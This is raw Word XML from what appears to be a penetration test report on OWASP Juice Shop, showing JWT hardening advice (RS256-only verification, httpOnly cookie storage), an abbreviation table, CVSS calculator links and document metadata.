        </w:rPr>
        <w:t xml:space="preserve">Algorithm Whitelist:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Only allow expected algorithms (RS256) and reject all others</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Strict Signature Verification:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Always verify signatures regardless of algorithm</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Use Secure Token Storage:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Store tokens in httpOnly cookies instead of localStorage to prevent XSS token theft</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1005"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Library Update:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Update to latest JWT library version with secure defaults</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Code Example (Node.js/jwt library):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pP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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Verify with explicit algorithm whitelist</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">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publicKey</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">algorithms</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">'RS256'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve">// Only allow RS256</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DataTypeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">complete</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p>
    <w:bookmarkEnd w:id="26"/>
    <w:bookmarkEnd w:id="27"/>
    <w:bookmarkEnd w:id="28"/>
    <w:bookmarkStart w:id="29" w:name="appendix-a---lists-scripts-and-raw-data"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Appendix A - Lists, Scripts and Raw Data</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:bookmarkStart w:id="30" w:name="appendix-b---list-of-abbreviations"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Appendix B - List of Abbreviations</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="4375"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1870"/>
        <w:gridCol w:w="5060"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Abbreviation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Description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CAPTCHA</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Completely Automated Public Turing test to</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">tell Computers and Humans Apart</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Common Vulnerability Scoring System</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">FTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">File Transfer Protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">IDOR</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Insecure Direct Object Reference</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Message-Digest Algorithm 5</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URI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Uniform Resource Identifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">WAF</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Web Application Firewall</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">+—————-+———————————————+</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ww.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId22" Target="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId16" Target="https://www.first.org/cvss/v4.0/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25" Target="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId22" Target="https://www.first.org/cvss/calculator/4.0#CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" TargetMode="External" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Id="rId16" Target="https://www.first.org/cvss/v4.0/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2026-02-22T01:41:23Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-02-22T01:41:23Z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2026-02-22</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OWASP Juice Shop v19.1.1</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